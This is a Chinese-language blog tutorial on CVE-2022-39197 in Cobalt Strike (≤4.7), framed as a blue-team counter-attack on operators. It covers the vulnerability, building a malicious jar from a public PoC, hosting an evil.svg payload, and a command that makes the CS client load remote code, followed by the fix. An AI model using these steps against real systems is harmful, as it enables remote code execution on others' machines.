蓝队反制之-Cobalt_Strike 反制

Cobalt_Strike <4.7.1 RCE (CVE-2022-39197)

01漏洞介绍

Cobalt Strike (CS) 是一个为对手模拟和红队行动而设计的平台,相当于增强版的Armitage,早期以Metasploit为基础框架,3.0版本之后作为独立平台开发,主要用于目标攻击和模拟后渗透行动。CS集成了端口转发、服务扫描、端口监听、木马生成、钓鱼攻击等功能,可以调用Mimikatz、Psexec等工具,与MSF进行联动,使用插件扩展功能,并且可以利用Malleable C2 profile 自定义通信流量特征,是内网大杀器,十分适合作为团队协同攻击工具使用。

由于Cobalt Strike 使用 GUI 框架 SWING开发,未经身份验证的远程攻击者可通过在 beacon 元数据中注入恶意 HTML 标签,与 Cobalt Strike 进行通信时,使得CS对其进行解析时加载恶意代码,从而在目标系统上执行任意代码使得CS对其进行解析时加载恶意代码,从而在目标系统上执行任意代码。

02漏洞危害

1、导致命令执行,服务器被入侵

2、内网被渗透,导致数据被窃取等风险

3、用户获取到使用Cobalt Strike的攻击者的木马样本后,反制正在使用Cobalt Strike 客户端的攻击者

03受影响的版本

Cobalt Strike <= 4.7

04漏洞复现

准备工具

1、Cobalt_Strike木马样本文件

2、漏洞验证POC/EXP

下载地址:https://github.com/its-arun/CVE-2022-39197

1、编辑恶意文件内容

编辑EvilJar\src\main\java\Exploit.java,更改第19行代码参数,我们本着验证的目的,就默认即可

2、编译文件

使用IDEA进行编译,具体步骤如图所示

编译完成后会在target目录下生成EvilJar-1.0-jar-with-dependencies.jar文件,也就是我们编译好的恶意文件

3、移动文件位置

将生成的恶意文件拷贝至serve路径下,同时将木马样本放在与cve-2022-39197.py脚本同一路径下

4、在serve路径下开启一个web服务

目标服务器可以访问即可

5、编辑evil.svg文件,将[attacker]替换为当前路径启用的web地址

6、执行POC脚本

python3 cve-2022-39197.py beacon.exe http://192.168.88.1:8080/evil.svg

运行后,cs客户端上可以看到此时木马已经成功上线

如果CS用户尝试获取用户会话的进程列表

当滚动进程列表点击当前会话所在进程时即触发xss,请求攻击者web服务上的evil.svg文件,而evil.svg文件又继续加载请求恶意文件EvilJar-1.0-jar-with-dependencies.jar,成功执行命令,从而达到RCE。

注意

运行了脚本后不要中途直接按Ctrl+C退出,这样不会结束木马的进程,木马程序还在后台运行着,让脚本自己结束或者自己手动结束进程,脚本运行100秒后会自动结束木马进程

展示

05修复建议

升级至 Cobalt Strike 4.7.2版本

相关jar包可在公众号获取

posted @ 2023-12-27 11:31  小阿辉谈安全  阅读(211)  评论(0编辑  收藏  举报